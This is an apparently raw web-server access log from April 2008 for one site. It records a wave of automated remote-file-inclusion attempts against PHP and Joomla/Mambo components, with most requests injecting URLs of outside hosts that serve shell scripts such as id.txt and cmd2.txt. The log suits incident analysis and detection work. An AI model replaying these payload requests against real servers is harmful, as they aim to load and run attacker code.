80.153.20.230 - - [29/Apr/2008:09:50:28 -0700] "GET /logs/access_080218.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:09:50:46 -0700] "GET /logs/home.php?content=ftp://84.32.137.157/incoming/upload/trex/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:09:50:47 -0700] "GET /logs/home.php?content=ftp://84.32.137.157/incoming/upload/trex/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:09:50:47 -0700] "GET /home.php?content=ftp://84.32.137.157/incoming/upload/trex/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:09:50:47 -0700] "GET /home.php?content=ftp://84.32.137.157/incoming/upload/trex/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.179.18 - - [29/Apr/2008:09:50:55 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.khalilshahr.com/cache/COPYRIGHT.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
72.55.179.18 - - [29/Apr/2008:09:50:55 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.khalilshahr.com/cache/COPYRIGHT.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
193.145.28.20 - - [29/Apr/2008:09:50:57 -0700] "GET /zoodvd//index.php?option=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:09:51:35 -0700] "GET /logs/access_080214.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.173.72 - - [29/Apr/2008:09:51:36 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://computasiunair.com/paddy/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:09:51:37 -0700] "GET /logs//?pg=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 200 45273 "-" "libwww-perl/5.811" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:09:51:37 -0700] "GET /logs/access_080214.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.173.72 - - [29/Apr/2008:09:51:37 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://computasiunair.com/paddy/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:09:51:41 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.810" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:09:51:43 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:09:51:43 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.810" "www.dmulk.com"
89.42.133.2 - - [29/Apr/2008:09:51:48 -0700] "GET /logs/index.php?go=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:09:51:50 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11607 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:09:51:50 -0700] "GET //?pg=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 200 11607 "-" "libwww-perl/5.811" "www.dmulk.com"
89.42.133.2 - - [29/Apr/2008:09:51:57 -0700] "GET /index.php?go=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.3 - - [29/Apr/2008:09:52:02 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://kukekaw.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.254.243.74 - - [29/Apr/2008:09:52:51 -0700] "GET /logs/forum.php?act=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.254.243.74 - - [29/Apr/2008:09:52:51 -0700] "GET /forum.php?act=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:09:53:16 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:09:53:16 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.22.185 - - [29/Apr/2008:09:53:30 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:09:53:31 -0700] "GET /logs/access_080211.log/accounts.php?command=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:09:53:31 -0700] "GET /accounts.php?command=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.19.38 - - [29/Apr/2008:09:53:31 -0700] "GET /bikes/CreSTOC07/?S=A HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:09:53:32 -0700] "GET /logs/accounts.php?command=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.170.23.54 - - [29/Apr/2008:09:53:36 -0700] "GET /logs/access_080201.loghttp://afterwedding.eclub.lv/images? HTTP/1.0" 404 275 "-" "Mozilla/4.75 [en]" "www.dmulk.com"
201.236.111.227 - - [29/Apr/2008:09:53:37 -0700] "GET /logs/access_080103.log/modules/xfsection/modify.php?dir_module=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.236.111.227 - - [29/Apr/2008:09:53:49 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.84.2 - - [29/Apr/2008:09:53:53 -0700] "GET /logs/errors.php?error=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.84.2 - - [29/Apr/2008:09:53:53 -0700] "GET /errors.php?error=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:53:54 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:53:55 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:53:55 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.172.175.130 - - [29/Apr/2008:09:54:04 -0700] "GET /logs/access_080211.log/accounts.php?command=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [29/Apr/2008:09:54:04 -0700] "GET /accounts.php?command=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [29/Apr/2008:09:54:05 -0700] "GET /logs/accounts.php?command=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:54:23 -0700] "GET /logs/access_080218.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:54:29 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:54:31 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.79" "www.dmulk.com"
92.48.75.104 - - [29/Apr/2008:09:54:42 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
92.48.75.104 - - [29/Apr/2008:09:54:43 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.193.60.15 - - [29/Apr/2008:09:55:38 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.193.60.15 - - [29/Apr/2008:09:55:38 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.193.60.15 - - [29/Apr/2008:09:55:38 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.236.111.227 - - [29/Apr/2008:09:55:50 -0700] "GET /logs/access_080126.log/modules/xfsection/modify.php?dir_module=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.216.189 - - [29/Apr/2008:09:56:01 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.216.189 - - [29/Apr/2008:09:56:01 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.216.189 - - [29/Apr/2008:09:56:02 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.216.189 - - [29/Apr/2008:09:56:08 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [29/Apr/2008:09:56:18 -0700] "GET /logs/access_080321.log/?mosConfig_absolute_path=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Apr/2008:09:56:22 -0700] "GET /?mosConfig_absolute_path=http://www.taow.net/league/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Apr/2008:09:56:23 -0700] "GET /logs/?mosConfig_absolute_path=http://www.taow.net/league/id.txt? HTTP/1.1" 200 45268 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.28.182 - - [29/Apr/2008:09:57:07 -0700] "GET /logs/access_080108.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.145.28.20 - - [29/Apr/2008:09:57:11 -0700] "GET /?mosConfig_absolute_path=http://www.taow.net/league/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
209.160.40.157 - - [29/Apr/2008:09:57:15 -0700] "GET /logs/access_080218.log/index.php?page=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.160.40.157 - - [29/Apr/2008:09:57:20 -0700] "GET /logs/index.php?page=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.160.40.157 - - [29/Apr/2008:09:57:22 -0700] "GET /index.php?page=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
217.172.175.130 - - [29/Apr/2008:09:57:31 -0700] "GET /accounts.php?command=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.195.37.115 - - [29/Apr/2008:09:57:43 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.115 - - [29/Apr/2008:09:57:44 -0700] "GET /logs/access_080201.log HTTP/1.0" 200 859311 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.122.156.59 - - [29/Apr/2008:09:57:59 -0700] "GET /enc/content.php?Home_Path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
222.122.156.59 - - [29/Apr/2008:09:57:59 -0700] "GET /logs/enc/content.php?Home_Path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:09:58:10 -0700] "GET /logs/access_080228.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:09:58:14 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:09:58:15 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:09:58:23 -0700] "GET /logs/access_080229.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.6.29.187 - - [29/Apr/2008:09:58:28 -0700] "GET /logs/access_071002.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.111.176.43 - - [29/Apr/2008:09:58:28 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.251.123 - - [29/Apr/2008:09:58:28 -0700] "GET /logs/access_080228.log/zoodvd//index.php?option=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.176.43 - - [29/Apr/2008:09:58:29 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [29/Apr/2008:09:58:47 -0700] "GET /logs/access_080218.log/modules/xfsection//modify.php?dir_module=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:09:59:04 -0700] "GET /lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:59:10 -0700] "GET /lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.193.60.15 - - [29/Apr/2008:09:59:10 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.193.60.15 - - [29/Apr/2008:09:59:10 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:09:59:38 -0700] "GET /lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:09:59:48 -0700] "GET /logs/lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:09:59:48 -0700] "GET /lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.251.123 - - [29/Apr/2008:10:00:33 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:10:00:33 -0700] "GET /logs/access_080227.log/components/com_performs/performs.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.251.123 - - [29/Apr/2008:10:00:34 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [29/Apr/2008:10:00:34 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:10:01:09 -0700] "GET /logs/cyberfolio/portfolio/msg/view.php?av=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:10:01:10 -0700] "GET /cyberfolio/portfolio/msg/view.php?av=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.193.60.15 - - [29/Apr/2008:10:01:56 -0700] "GET /logs/access_080321.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.191.81.165 - - [29/Apr/2008:10:01:58 -0700] "GET /logs/access_080227.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.191.81.165 - - [29/Apr/2008:10:01:58 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.191.81.165 - - [29/Apr/2008:10:01:59 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:02:18 -0700] "GET /logs/access_080223.log/lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:02:18 -0700] "GET /lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:02:19 -0700] "GET /logs/lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:02:31 -0700] "GET /logs/access_080219.log/lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:02:31 -0700] "GET /logs/access_080223.log/lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:02:32 -0700] "GET /lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:02:32 -0700] "GET /logs/lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:02:44 -0700] "GET /logs/access_080219.log/lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.73.117 - - [29/Apr/2008:10:02:47 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.30.73.117 - - [29/Apr/2008:10:02:48 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.81.165 - - [29/Apr/2008:10:02:52 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
24.148.29.218 - - [29/Apr/2008:10:03:27 -0700] "GET /logs/index.php?option=com_joomlaxplorer&action=show_error&dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:03:28 -0700] "GET /logs/lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:03:28 -0700] "GET /lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.148.29.218 - - [29/Apr/2008:10:03:32 -0700] "GET /index.php?option=com_joomlaxplorer&action=show_error&dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [29/Apr/2008:10:03:33 -0700] "GET /lang.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.251.123 - - [29/Apr/2008:10:03:40 -0700] "GET /logs/access_080228.log/?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:03:53 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:03:57 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 200 11606 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:03:58 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:04:00 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
